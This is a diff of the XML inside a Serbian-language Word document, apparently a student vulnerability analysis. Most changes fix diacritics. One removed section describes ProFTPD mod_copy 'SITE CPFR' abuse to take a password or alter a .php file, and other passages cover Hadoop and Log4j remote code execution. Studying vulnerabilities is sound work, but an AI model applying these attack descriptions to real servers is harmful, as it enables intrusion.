-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
 </w:numbering>
 </file>
@@ -9354,7 +10595,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading2Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="00BF485A"/>
@@ -9443,7 +10683,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading6Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="00BF485A"/>
@@ -9569,7 +10808,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading2"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="00BF485A"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
@@ -9622,7 +10860,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading6"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="00BF485A"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>

--- a/Projekat/Selena Milutin- analiza.docx
+++ b/Projekat/Selena Milutin- analiza.docx
@@ -1819,7 +1819,13 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Da.</w:t>
+        <w:t>Ne</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1874,42 +1880,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1.3.5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Mod_Copy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Command Execution)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (true)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -1989,236 +1959,6 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dati </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>primeri</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>pokreču</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SITE CPFR </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>komandu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. U </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>jednom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>primeru</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>skida</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>lozinku</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a u </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>drugom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>menjaju</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>sadržaj</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>fajla</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> koji se </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>posle</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>može</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>pokrenuti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> u </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>pozadini</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3551,42 +3291,42 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
+        <w:t>Nadogradi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Apache Hadoop 3.3.5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Nadogradi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>na</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Apache Hadoop 3.3.5.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
         <w:t xml:space="preserve">Ako Yarn Secure Containers </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -4390,6 +4130,41 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>https://github.com/advisories/GHSA-94jh-j374-9r3j</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.cvedetails.com/cve/CVE-2023-26031/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://lists.apache.org/thread/q9qpdlv952gb4kphpndd5phvl7fkh71r</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4443,7 +4218,7 @@
       <w:r>
         <w:t>Hadoop uses the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4473,7 +4248,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
+      <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4604,6 +4379,7 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Apache Log4j2 2.0-beta9 </w:t>
       </w:r>
       <w:r>
@@ -4700,7 +4476,6 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>drugih</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -4893,7 +4668,10 @@
         <w:t>log4j 2.15.0</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">ovo </w:t>
+        <w:t>. O</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">vo </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5040,7 +4818,18 @@
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Koristeci</w:t>
+        <w:t>Koriste</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5118,7 +4907,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>trce</w:t>
+        <w:t>tr</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5142,7 +4937,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>masini</w:t>
+        <w:t>ma</w:t>
+      </w:r>
+      <w:r>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ini</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5166,15 +4967,24 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>kontrolise</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>napadac</w:t>
+        <w:t>kontroli</w:t>
+      </w:r>
+      <w:r>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>napada</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5195,15 +5005,21 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>kljuc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ce</w:t>
+        <w:t>klju</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5252,7 +5068,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Medutim</w:t>
+        <w:t>Me</w:t>
+      </w:r>
+      <w:r>
+        <w:t>đ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utim</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5268,15 +5090,24 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>kljuc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sadrzi</w:t>
+        <w:t>klju</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sadr</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5300,7 +5131,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>slucaju</w:t>
+        <w:t>slu</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:t>aju</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5338,7 +5175,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>nece</w:t>
+        <w:t>ne</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5383,15 +5226,24 @@
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Napadac</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>moze</w:t>
+        <w:t>Napada</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5399,7 +5251,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>nadje</w:t>
+        <w:t>na</w:t>
+      </w:r>
+      <w:r>
+        <w:t>đ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5415,7 +5273,10 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>cuva</w:t>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:t>uva</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5546,7 +5407,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>kontrolise</w:t>
+        <w:t>kontroli</w:t>
+      </w:r>
+      <w:r>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5586,7 +5453,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>moze</w:t>
+        <w:t>mo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5624,8 +5497,19 @@
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Moze da </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5661,15 +5545,27 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>takodje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>moze</w:t>
+        <w:t>tako</w:t>
+      </w:r>
+      <w:r>
+        <w:t>đ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5709,7 +5605,13 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>nacin</w:t>
+        <w:t>na</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:t>in</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7164,7 +7066,25 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>vecina</w:t>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ina</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7192,7 +7112,31 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>ukljucujuci</w:t>
+        <w:t>uklju</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uju</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ć</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>i</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7227,7 +7171,19 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Log4j. ova </w:t>
+        <w:t xml:space="preserve"> Log4j.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">va </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7276,20 +7232,27 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>sto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>dozvoljava</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -7318,21 +7281,45 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>izvrsavanje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>tudjeg</w:t>
+        <w:t>izvr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>avanje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>tu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>đ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>eg</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7464,7 +7451,6 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="1BAD80CF">
           <v:rect id="_x0000_i1032" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
@@ -7684,7 +7670,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId17"/>
                     <a:srcRect l="1410" t="45814" r="54103" b="31167"/>
                     <a:stretch>
                       <a:fillRect/>
@@ -7716,24 +7702,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7812,6 +7784,1567 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Na </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>nekom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>udaljenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
